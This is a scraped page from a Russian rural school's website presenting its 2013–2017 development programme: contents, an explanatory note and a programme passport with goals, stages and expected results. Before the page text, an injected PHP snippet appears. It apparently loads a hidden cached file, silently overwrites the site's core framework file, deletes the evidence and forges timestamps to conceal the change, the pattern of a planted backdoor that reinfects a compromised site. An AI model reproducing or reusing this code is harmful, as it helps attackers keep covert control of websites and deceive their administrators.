$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Программа развития школы

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 210421

На сайте

Сейчас 46 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Программа развития школы

СКАЧАТЬ Программу развития школы

СОДЕРЖАНИЕ

1. Пояснительная записка……………………………………………….....3

2. Паспорт Программы развития…………………………………………..5

3. Информационная справка о школе……………………………...........14

3.1 Характеристика окружающего социума.............................................14

3.2 Краткая социальная характеристика контингента родителей

обучающихся...............................................................................................15

3.3 Роль в социуме.......................................................................................16

3.4 Характеристика образовательного процесса и его

организационно- педагогическое обеспечение........................................17

3.5 Сведения об учащихся........................................................................18

3.6 Характеристика педагогических кадров.............................................26

3.7 Сведения о материально-технической базе школы и ее состоянии.29

3.8 Финансовое обеспечение и его источники.........................................30

3.9 Позитивные изменения и проблемы учебно-воспитательного

процесса школы...............................................................................30

3.10 Проблемный анализ ситуации..........................................................32

4. Миссия школы……………………………………………………….....36

5. Концепция Программы развития школы……………………………..37

6. Механизм реализации Программы развития школы…………….......43

7. Основные направления Программы развития школы……………….43

7.1 Переход на новые образовательные стандарты…………….............43

7.2 Создание условий для актуализации самообразовательной

деятельности учащихся..............................................................................46

7.3 Взаимодействие с родителями.............................................................54

7.4 Управление образовательным процессом...........................................57

7.5Обеспечение возможности самореализации личности

школьника……………………….................................................................59

7.6 Создание условий для успешной социализации и гражданского

становления личности.................................................................................62

7.7 Совершенствование учительского корпуса…………………............68

7.8 Изменение школьной инфраструктуры……………………...............70

7.9 Сохранение и укрепление здоровья школьников...............................73

8. Оценка результатов реализации Программы развития школы

на 2013-2017 годы……………………………………………....................76

9. Предполагаемые результаты реализации Программы развития….....80

10. Возможные риски и способы их минимизации……………………..81

11. Основные направления развития ресурсной базы………………….81

12. Организация руководства и контроля в ходе реализации

Программы развития……………………………………………...............83

Тезаурус……………………………………………………………………85

Список использованных источников…………………………………..125

Сам облик школ, как по форме, так и по содержанию

должен значительно измениться.

Мы получим реальную отдачу, если учиться

в школе будет увлекательно и интересно.

Д. Медведев

1. ПОЯСНИТЕЛЬНАЯ ЗАПИСКА

В свете новых изменений в обществе, модернизация и инновационное развитие - единственный путь, который позволит России стать конкурентным обществом в мире XXI века, обеспечить достойную жизнь всем гражданам. Школьное обучение должно быть построено так, чтобы выпускники могли самостоятельно ставить и достигать серьёзных целей, умело реагировать на разные жизненные ситуации. В условиях решения этих стратегических задач важнейшими качествами личности становятся инициативность, способность творчески мыслить и находить нестандартные решения, умение выбирать профессиональный путь, готовность обучаться в течение всей жизни. Все эти навыки формируются с детства.

Не менее важные задачи современной школы - раскрытие способностей каждого обучающегося, воспитание высоконравственного патриота своей Родины, личности, готовой к жизни в технологичном, конкурентном мире. Поэтому образованию отводится ключевая роль в духовно-нравственном развитии общества, его способности противостоять перед лицом внешних и внутренних вызовов. Наиболее системно, последовательно и глубоко развитие и воспитание личности происходит в сфере общего образования. Именно в школе должна быть сосредоточена не только интеллектуальная, но и духовная, культурная жизнь школьника. Ребенок школьного возраста наиболее восприимчив к эмоционально-ценностному, духовному, нравственному развитию и воспитанию. В то же время недостатки развития и воспитания в этот период жизни трудно восполнить в последующие годы.

Новая российская общеобразовательная школа должна стать важнейшим фактором, обеспечивающим социокультурную модернизацию российского общества. Поэтому появилась необходимость построения образовательного процесса в школе на совершенно иной основе, на основе приоритета личностно ориентированного обучения, развития и воспитания обучающихся. Смена парадигмы образования от традиционной к личностно ориентированной требует формирования нового профессионального мышления, совершенствования качества образования, запуска новых механизмов психолого-педагогического и медико-социального сопровождения образовательного процесса.

Личностно ориентированный подход к образованию предполагает развитие личности, для которой участие в делах гражданского общества не столько извне навязанная обязанность, сколько результат внутреннего побуждения и осмысленного выбора. Такой подход предполагает и иную модель взаимодействия участников образовательного процесса. Направленность и особенности организации учебного процесса в значительной мере определяют характер взаимодействия между участниками образовательного процесса в их учебной и педагогической деятельности. Важными здесь являются приоритетные методы преподавания (учения), ориентация на коллективные (индивидуальные) способы обучения, степень учета интересов и способностей учащихся, способы и стиль взаимодействия учителя с коллегами и учениками, реальная возможность выбора учеником содержания обучения, уровня и методов его усвоения. Большую роль играет степень профессиональной компетентности педагогов школы, «качество» преподавательского корпуса (уровень профессиональных знаний, умений и навыков, сформированность профессионально значимых личностных качеств, обеспечивающих готовность к организации конструктивного взаимодействия, инновационной деятельности и стремление к профессиональному совершенствованию, личностному росту и др.).

Настоящая Программа развития школы определяет стратегию и приоритетные направления развития школы на 2013-2017 годы. Программа предназначена для обеспечения перехода школы в новое состояние, обеспечивающее качество образования, адекватное потребностям развивающейся личности, государства и общества.

Деятельность школы планируется осуществлять в рамках системно-модульной модели развития, основные характеристики которой выражаются в том, что из числа наиболее активных творческих учителей организуется деятельность инновационных групп, работающих в несколько автономном режиме; далее осуществляется анализ и оценка результатов; и затем происходит внедрение результатов инновационной деятельности в практику педагогического коллектива. Деятельность инновационных групп значительно влияет на процесс развития школы. Целостность развития школы достигается за счет нормативного внедрения результатов инновационной работы, которые получают дальнейшее развитие в педагогических советах, научно-методических чтениях и конференциях.

Педагогическое кредо коллектива – природосообразная и разумно инновационная школа, базирующаяся на принципах педагогики сотрудничества, предоставляющая своим ученикам в образовании равные возможности, реализация которых осуществляется учащимися в соответствии с их личностным выбором и индивидуальными способностями и возможностями.

Актуальность Программы развития определяет научно-методическую тему, над которой работает педагогический коллектив: "Личностно-ориентированное образование школьников как средство актуализации самообразовательной деятельности учителя и ученика".

2. ПАСПОРТ ПРОГРАММЫ РАЗВИТИЯ

 

1

Полное наименование

Программы

Программа развития муниципального общеобразовательного учреждения «Сагарчинская средняя общеобразовательная школа»  на 2013-2017 годы. Модернизация образования сельской школы в свете инновационных образовательных технологий и актуализации самообразовательной деятельности учителя и ученика.

2

Основания

для разработки

Программы

1. Закон Российской Федерации «Об образовании» и Концепция проекта нового Федерального закона «Об образовании» (редакция от 23.07.2013 г.).

2. Федеральный государственный образовательный стандарт начального общего образования, утвержденный приказом Министерства образования и науки Российской Федерации от 06.10.2009 № 373.

3. Федеральный государственный образовательный стандарт основного общего образования, утвержденный приказом Министерства образования и науки Российской Федерации от 17.12.2010 г. № 1897.

4. Приоритетные направления развития образовательной системы Российской Федерации (Одобрены на заседании Правительства Российской Федерации 9 декабря 2004 г.; протокол N 47, раздел I).

5. Конвенция о правах ребенка.

6. Конституции Российской Федерации.

7. Национальная образовательная инициатива «Наша новая школа», утвержденная Президентом Российской Федерации от 04.02.2010 № Пр-271.

8. План действий по модернизации общего образования на 2011–2015 гг., утвержденный Распоряжением Правительства Российской Федерации от 07.09.2010 № 1507-р.

3

Разработчики

Программы

1. Педагогический коллектив МБОУ «Сагарчинская средняя общеобразовательная школа»;

2. Н.М. Миняева, доктор педагогических наук, доцент;

3. Т.М. Толкачева, кандидат педагогических наук, доцент кафедры педагогического образования Акбулакского филиала ОГУ;

Научный консультант: Л.Б. Соколова, доктор педагогических наук, профессор кафедры высшей школы Оренбургского педагогического университета.

4

Цель Программы

Переход общеобразовательного учреждения в качественно новое состояние, соответствующее государственным стандартам нового поколения, требованиям, изложенным в Национальной образовательной инициативе «Наша новая школа»

5

Задачи Программы

- обновление содержания образования и педагогических технологий через введение ФГОС второго поколения;

- развитие кадрового потенциала школы;

- формирование и развитие школьной системы оценки качества образования;

- формирование системы работы с одаренными детьми;

- создание условий и использования инновационных механизмов развития системы воспитания и дополнительного образования детей;

- укрепление и сохранение здоровья детей;

- модернизация материально-технической базы школы.

Этапы реализации Программы:

1

I этап –

Организацион-

но-подготови-

тельный

– май 2013

- сентябрь

2013 г.

Выявление перспективных направлений развития школы и моделирование её нового качественного состояния:

- работа по подготовке кадровых, нормативно-правовых, материально-технических, финансовых ресурсов для реализации преобразований (внесение изменений в Устав, разработка положений, укрепление материальной базы).

- анализ, корректировка цели, конкретизация задач и содержания работы на этапе.

2

II этап –

коррекционно-

развивающий

– сентябрь

2013 -

август 2016 г.

Переход образовательного учреждения в новое качественное состояние:

- реализация разработанных подпрограмм и организационных механизмов внедрения отработанных инновационных проектов в деятельности школы, мониторинг программы и ее корректировка;

- анализ, корректировка целей, задач и конкретизация действий на этапе.

3

III этап –

аналитико-

информацион-

ный

– сентябрь

2016 -

август 2017 г.

Анализ результатов программы, оценка её эффективности:

- опубликование результатов (в СМИ, через школьный сайт, на родительском собрании);

- выявление новых проблем для совершенствования УВП школы на последующий период.  Результаты реализации Программы рассматриваются на заседаниях Совета школы, Методического Совета, педсоветах.

4

Исполнители

Программы

(подпрограмм

и основных

мероприятий)

Администрация, педагогический коллектив, ученический коллектив, родительская общественность, социальные партнёры школы.

5

Ресурсное

обеспечение

реализации

Программы

Данная Программа может быть реализована при наличии:

- высококвалифицированных кадров;

- хорошо развитой материально-технической базы;

- информационного обеспечения образовательного процесса;

- стойкой мотивации педагогов к внедрению инноваций в учебный и воспитательный процессы;

- постоянного финансирования Программы:

а) из бюджетных средств;

б) из внебюджетных источников.

6

Ожидаемые

конечные

результаты

реализации

программы

Ожидаемые результаты:

- достижение соответствия между реально достигнутыми и планируемыми результатами;

- существенный рост качества образовательного процесса при сравнительно небольших финансовых и материально- технических затратах;

- эффективное функционирование поливариантных компонентов образовательной среды школы;

- освоение технологий развивающего обучения, ставшего основой создания модели образовательной среды, которая обеспечивает расширение социальных, культурных возможностей и жизненных шансов подрастающего человека. При этом цели и задачи образования должны быть направлены на воспитание новых ценностных установок и деятельностных способностей человека;

- создание максимально благоприятных условий для умственного, нравственного, эмоционального и физического развития личности, развития её способностей, мышления и деятельности;

- формирование и развитие личности с развитым интеллектом и высоким уровнем компетенций, подготовленной к жизни в гражданском обществе и усвоению профессиональных и образовательных программ;

- повышение теоретического уровня образования, передача детям не только эмпирических знаний и умений, но и высоких форм общественного сознания (научных понятий, художественных образов, нравственных ценностей);

- повышение профессиональной мотивации работников школы;

- реализация идей и задач развития позитивно скажутся на интеллектуальном развитии детей; повысится уровень осознанного отношения к учению, жизни вообще, расширится круг познавательных интересов;

- опыт, приобретённый в различных сообществах, будет способствовать развитию навыков общения, социальной активности, ответственности;

- улучшатся взаимоотношения в семьях учащихся - более глубоким станет понимание родителями и детьми друг друга, более тесным станет общение семьи и школы;

- возрастёт авторитет школы в районе.

7

Порядок

мониторинга

хода и

результатов

реализации

Программы

развития

Мониторинг осуществляется с использованием таких форм, как социологический опрос, анкетирование, текущая аттестация, итоговая аттестация, экспертные оценки, разнообразные способы учёта творческих достижений педагогов и обучающихся, анализ качественных и количественных показателей.

 

 

 

 

 

 

СКАЧАТЬ Программу развития школы